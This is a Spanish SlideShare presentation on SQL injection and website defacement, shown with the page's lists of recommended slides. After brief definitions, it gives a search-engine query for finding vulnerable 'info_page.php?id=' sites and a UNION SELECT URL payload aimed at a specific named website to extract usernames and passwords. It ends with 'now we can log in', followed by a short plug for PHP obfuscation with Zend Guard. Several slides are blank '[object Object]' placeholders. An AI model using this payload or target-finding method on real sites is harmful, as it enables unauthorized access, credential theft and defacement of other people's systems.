SlideShare a Scribd company logo

Sql injection

Download as PPTX, PDF
M
Minoxx
1 of 18
SQL Injection
¿Que es SQL Injection? Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
¿Que es Deface? El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.
Pasos: Buscando website vulnerable. Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "=" Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2. Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass). http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGES Si no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.
OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS
OFUSCAR CODIGO EN PHP: Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.
¿Cómo evitar esto? La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas. En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.
Sql injection
Sql injection
Sql injection
Sql injection
Sql injection

Recommended

Inyeccion sql
Inyeccion sqlInyeccion sql
Inyeccion sqlobispo28
 
Inyección_sql
Inyección_sqlInyección_sql
Inyección_sqljhom123
 
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)toshko86
 
Inyecciones SQL
Inyecciones SQLInyecciones SQL
Inyecciones SQLAndy Gomez Soria
 
Inyeccion de codigo
Inyeccion de codigoInyeccion de codigo
Inyeccion de codigoFederico Hernández González
 
Seguridad sql injection
Seguridad sql injectionSeguridad sql injection
Seguridad sql injectionGary Briceño
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendicesTensor
 
Inyección sql1
Inyección sql1Inyección sql1
Inyección sql1piolincita89
 

Recommended

Inyeccion sql
Inyeccion sqlInyeccion sql
Inyeccion sqlobispo28
 
Inyección_sql
Inyección_sqlInyección_sql
Inyección_sqljhom123
 
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)toshko86
 
Inyecciones SQL
Inyecciones SQLInyecciones SQL
Inyecciones SQLAndy Gomez Soria
 
Inyeccion de codigo
Inyeccion de codigoInyeccion de codigo
Inyeccion de codigoFederico Hernández González
 
Seguridad sql injection
Seguridad sql injectionSeguridad sql injection
Seguridad sql injectionGary Briceño
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendicesTensor
 
Inyección sql1
Inyección sql1Inyección sql1
Inyección sql1piolincita89
 
Inyección de código
Inyección de códigoInyección de código
Inyección de códigoCarlos Arturo Fyuler
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0José Moreno
 
Base de datos
Base de datosBase de datos
Base de datosBlind Jose
 
Ataques de inyección SQL: qué son y cómo protegerse
Ataques de inyección SQL: qué son y cómo protegerseAtaques de inyección SQL: qué son y cómo protegerse
Ataques de inyección SQL: qué son y cómo protegerseSupra Networks
 
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...Jesús Daniel Mayo
 
Programación orientada a objetos II
Programación orientada a objetos IIProgramación orientada a objetos II
Programación orientada a objetos IIyanburbano
 
Android Base de Datos
Android Base de DatosAndroid Base de Datos
Android Base de DatosGeyser Angaspilco Montenegro
 
Forzar claves
Forzar clavesForzar claves
Forzar clavesMiguel Sanchez Enriquez
 
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008Christian Martorella
 
Vulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones webVulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones webRealTIC
 
Crear vistas en microsoft access
Crear vistas en microsoft accessCrear vistas en microsoft access
Crear vistas en microsoft accessJair Ospino Ardila
 
Bd eq5 a2_apo_comparativa_unidad2
Bd eq5 a2_apo_comparativa_unidad2Bd eq5 a2_apo_comparativa_unidad2
Bd eq5 a2_apo_comparativa_unidad2sesshomaru25
 
Symfony2 - ACL
Symfony2 - ACLSymfony2 - ACL
Symfony2 - ACLGonzalo Alonso
 
Programa 9
Programa 9Programa 9
Programa 9Erick Ramirez
 
Vistas en bases de datos
Vistas en bases de datosVistas en bases de datos
Vistas en bases de datosDenisse C
 
Configuracion sql
Configuracion sqlConfiguracion sql
Configuracion sqldiego david martinez
 
04 enunciado de laboratorio 1.3
04 enunciado de laboratorio 1.304 enunciado de laboratorio 1.3
04 enunciado de laboratorio 1.3KikeSanchezAguilar
 
Aplicación abc. asp net mvc 3
Aplicación abc. asp net mvc 3Aplicación abc. asp net mvc 3
Aplicación abc. asp net mvc 3jose luis barrientos
 
la mejor forma de Conectar c# con mysql con archivos de configuracion
la mejor forma de Conectar c# con mysql con archivos de configuracion la mejor forma de Conectar c# con mysql con archivos de configuracion
la mejor forma de Conectar c# con mysql con archivos de configuracion juandavid1118
 
Seguridad en Aplicaciones ASP.NET
Seguridad en Aplicaciones ASP.NETSeguridad en Aplicaciones ASP.NET
Seguridad en Aplicaciones ASP.NETKike Salaverria
 
Phishing
PhishingPhishing
Phishinginstitutoderechoinformatico
 
Presentación delitos inf fiscalia- Barranquilla
Presentación delitos inf fiscalia- BarranquillaPresentación delitos inf fiscalia- Barranquilla
Presentación delitos inf fiscalia- Barranquillaticsydelitos
 

More Related Content

What's hot

Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0José Moreno
 
Ataques de inyección SQL: qué son y cómo protegerse
Ataques de inyección SQL: qué son y cómo protegerseAtaques de inyección SQL: qué son y cómo protegerse
Ataques de inyección SQL: qué son y cómo protegerseSupra Networks
 
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...Jesús Daniel Mayo
 
Programación orientada a objetos II
Programación orientada a objetos IIProgramación orientada a objetos II
Programación orientada a objetos IIyanburbano
 
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008Christian Martorella
 
Vulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones webVulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones webRealTIC
 
Crear vistas en microsoft access
Crear vistas en microsoft accessCrear vistas en microsoft access
Crear vistas en microsoft accessJair Ospino Ardila
 
Bd eq5 a2_apo_comparativa_unidad2
Bd eq5 a2_apo_comparativa_unidad2Bd eq5 a2_apo_comparativa_unidad2
Bd eq5 a2_apo_comparativa_unidad2sesshomaru25
 
Vistas en bases de datos
Vistas en bases de datosVistas en bases de datos
Vistas en bases de datosDenisse C
 
04 enunciado de laboratorio 1.3
04 enunciado de laboratorio 1.304 enunciado de laboratorio 1.3
04 enunciado de laboratorio 1.3KikeSanchezAguilar
 
la mejor forma de Conectar c# con mysql con archivos de configuracion
la mejor forma de Conectar c# con mysql con archivos de configuracion la mejor forma de Conectar c# con mysql con archivos de configuracion
la mejor forma de Conectar c# con mysql con archivos de configuracion juandavid1118
 
Seguridad en Aplicaciones ASP.NET
Seguridad en Aplicaciones ASP.NETSeguridad en Aplicaciones ASP.NET
Seguridad en Aplicaciones ASP.NETKike Salaverria
 

What's hot (20)

Inyección de código
Inyección de códigoInyección de código
Inyección de código
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
 
Base de datos
Base de datosBase de datos
Base de datos
 
Ataques de inyección SQL: qué son y cómo protegerse
Ataques de inyección SQL: qué son y cómo protegerseAtaques de inyección SQL: qué son y cómo protegerse
Ataques de inyección SQL: qué son y cómo protegerse
 
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
Evidencia Informe amenaza a las bases de datos - Gestión de la Seguridad Info...
 
Programación orientada a objetos II
Programación orientada a objetos IIProgramación orientada a objetos II
Programación orientada a objetos II
 
Android Base de Datos
Android Base de DatosAndroid Base de Datos
Android Base de Datos
 
Forzar claves
Forzar clavesForzar claves
Forzar claves
 
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
 
Vulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones webVulnerabilidades en aplicaciones web
Vulnerabilidades en aplicaciones web
 
Crear vistas en microsoft access
Crear vistas en microsoft accessCrear vistas en microsoft access
Crear vistas en microsoft access
 
Bd eq5 a2_apo_comparativa_unidad2
Bd eq5 a2_apo_comparativa_unidad2Bd eq5 a2_apo_comparativa_unidad2
Bd eq5 a2_apo_comparativa_unidad2
 
Symfony2 - ACL
Symfony2 - ACLSymfony2 - ACL
Symfony2 - ACL
 
Programa 9
Programa 9Programa 9
Programa 9
 
Vistas en bases de datos
Vistas en bases de datosVistas en bases de datos
Vistas en bases de datos
 
Configuracion sql
Configuracion sqlConfiguracion sql
Configuracion sql
 
04 enunciado de laboratorio 1.3
04 enunciado de laboratorio 1.304 enunciado de laboratorio 1.3
04 enunciado de laboratorio 1.3
 
Aplicación abc. asp net mvc 3
Aplicación abc. asp net mvc 3Aplicación abc. asp net mvc 3
Aplicación abc. asp net mvc 3
 
la mejor forma de Conectar c# con mysql con archivos de configuracion
la mejor forma de Conectar c# con mysql con archivos de configuracion la mejor forma de Conectar c# con mysql con archivos de configuracion
la mejor forma de Conectar c# con mysql con archivos de configuracion
 
Seguridad en Aplicaciones ASP.NET
Seguridad en Aplicaciones ASP.NETSeguridad en Aplicaciones ASP.NET
Seguridad en Aplicaciones ASP.NET
 

Viewers also liked

Presentación delitos inf fiscalia- Barranquilla
Presentación delitos inf fiscalia- BarranquillaPresentación delitos inf fiscalia- Barranquilla
Presentación delitos inf fiscalia- Barranquillaticsydelitos
 
Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1Tensor
 
Sql injection utilizando método post
Sql injection utilizando método postSql injection utilizando método post
Sql injection utilizando método postTensor
 
Delitos Informáticos. Análisis Forense
Delitos Informáticos. Análisis ForenseDelitos Informáticos. Análisis Forense
Delitos Informáticos. Análisis ForensePablo Llanos Urraca
 
CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)
CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)
CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)Videoconferencias UTPL
 
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]RootedCON
 
Unidad 4 calculo integral
Unidad 4 calculo integralUnidad 4 calculo integral
Unidad 4 calculo integralOscar Saenz
 
Cálculo Integral en las Ciencias Biológicas
Cálculo Integral en las Ciencias BiológicasCálculo Integral en las Ciencias Biológicas
Cálculo Integral en las Ciencias BiológicasJulio Samanamud
 
Economia y politica
Economia y politicaEconomia y politica
Economia y politicateocaso
 
Aplicaciones simples de calculo integral
Aplicaciones simples de calculo integralAplicaciones simples de calculo integral
Aplicaciones simples de calculo integralAaron Fano
 
Karl marx power point
Karl marx power pointKarl marx power point
Karl marx power pointguatrache
 
INTEGRAL INDEFINIDA Y SUS APLICACIONES
INTEGRAL INDEFINIDA Y SUS APLICACIONESINTEGRAL INDEFINIDA Y SUS APLICACIONES
INTEGRAL INDEFINIDA Y SUS APLICACIONESGary Sv
 

Viewers also liked (20)

Phishing
PhishingPhishing
Phishing
 
Presentación delitos inf fiscalia- Barranquilla
Presentación delitos inf fiscalia- BarranquillaPresentación delitos inf fiscalia- Barranquilla
Presentación delitos inf fiscalia- Barranquilla
 
Jornada de derecho y delitos informáticos
Jornada de derecho y delitos informáticosJornada de derecho y delitos informáticos
Jornada de derecho y delitos informáticos
 
Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1
 
Sql injection utilizando método post
Sql injection utilizando método postSql injection utilizando método post
Sql injection utilizando método post
 
Delitos Informáticos. Análisis Forense
Delitos Informáticos. Análisis ForenseDelitos Informáticos. Análisis Forense
Delitos Informáticos. Análisis Forense
 
CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)
CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)
CÁLCULO PARA CIENCIAS BIOLÓGICAS (II Bimestre Abril Agosto 2011)
 
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Unidad 4 calculo integral
Unidad 4 calculo integralUnidad 4 calculo integral
Unidad 4 calculo integral
 
Cálculo Integral en las Ciencias Biológicas
Cálculo Integral en las Ciencias BiológicasCálculo Integral en las Ciencias Biológicas
Cálculo Integral en las Ciencias Biológicas
 
ECONOMÍA POLÍTICA CAPÍTULO 5. LA MACROECONOMÍA: UNA VISIÓN GLOBAL
ECONOMÍA POLÍTICA CAPÍTULO 5. LA MACROECONOMÍA: UNA VISIÓN GLOBALECONOMÍA POLÍTICA CAPÍTULO 5. LA MACROECONOMÍA: UNA VISIÓN GLOBAL
ECONOMÍA POLÍTICA CAPÍTULO 5. LA MACROECONOMÍA: UNA VISIÓN GLOBAL
 
Sql injection
Sql injectionSql injection
Sql injection
 
Economia y politica
Economia y politicaEconomia y politica
Economia y politica
 
Aplicaciones simples de calculo integral
Aplicaciones simples de calculo integralAplicaciones simples de calculo integral
Aplicaciones simples de calculo integral
 
Aplicaciones del calculo integral
Aplicaciones del calculo integralAplicaciones del calculo integral
Aplicaciones del calculo integral
 
Karl marx power point
Karl marx power pointKarl marx power point
Karl marx power point
 
INTEGRAL INDEFINIDA Y SUS APLICACIONES
INTEGRAL INDEFINIDA Y SUS APLICACIONESINTEGRAL INDEFINIDA Y SUS APLICACIONES
INTEGRAL INDEFINIDA Y SUS APLICACIONES
 
Filosofía Latinoamericana
Filosofía LatinoamericanaFilosofía Latinoamericana
Filosofía Latinoamericana
 
Karl Marx
Karl MarxKarl Marx
Karl Marx
 

Similar to Sql injection

Inyecciones SQL para Aprendices
Inyecciones SQL para AprendicesInyecciones SQL para Aprendices
Inyecciones SQL para AprendicesTensor
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Inyecciones sql para todos
Inyecciones sql para todosInyecciones sql para todos
Inyecciones sql para todoscsaralg
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Softwarelechosopowers
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones webJose Mato
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3tantascosasquenose
 
Replicacion de datos en Oracle
Replicacion de datos en OracleReplicacion de datos en Oracle
Replicacion de datos en OracleJenny Palma
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebEduardo Jalon
 
Programando en-serio-con-visual-basic
Programando en-serio-con-visual-basicProgramando en-serio-con-visual-basic
Programando en-serio-con-visual-basicusuario230
 
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexicoColegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico25415252
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Hacking & Hardening Drupal
Hacking & Hardening DrupalHacking & Hardening Drupal
Hacking & Hardening Drupalzekivazquez
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 

Similar to Sql injection (20)

Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 
Inyecciones SQL para Aprendices
Inyecciones SQL para AprendicesInyecciones SQL para Aprendices
Inyecciones SQL para Aprendices
 
Inyeccion sql by Anonymous - Americalatina
Inyeccion sql by Anonymous - AmericalatinaInyeccion sql by Anonymous - Americalatina
Inyeccion sql by Anonymous - Americalatina
 
Seguridad en PHP (es)
Seguridad en PHP (es)Seguridad en PHP (es)
Seguridad en PHP (es)
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Inyecciones sql para todos
Inyecciones sql para todosInyecciones sql para todos
Inyecciones sql para todos
 
Seguridad En Programación
Seguridad En ProgramaciónSeguridad En Programación
Seguridad En Programación
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Software
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3
 
Replicacion de datos en Oracle
Replicacion de datos en OracleReplicacion de datos en Oracle
Replicacion de datos en Oracle
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación Web
 
Funciones de-visual
Funciones de-visualFunciones de-visual
Funciones de-visual
 
Funciones de-visual
Funciones de-visualFunciones de-visual
Funciones de-visual
 
Programando en-serio-con-visual-basic
Programando en-serio-con-visual-basicProgramando en-serio-con-visual-basic
Programando en-serio-con-visual-basic
 
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexicoColegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4
 
Hacking & Hardening Drupal
Hacking & Hardening DrupalHacking & Hardening Drupal
Hacking & Hardening Drupal
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 

Sql injection

  • 2. ¿Que es SQL Injection? Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
  • 3. ¿Que es Deface? El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.
  • 4. Pasos: Buscando website vulnerable. Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "=" Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10. Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2. Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass). http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGES Si no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.
  • 11. OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS
  • 12. OFUSCAR CODIGO EN PHP: Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.
  • 13. ¿Cómo evitar esto? La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas. En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.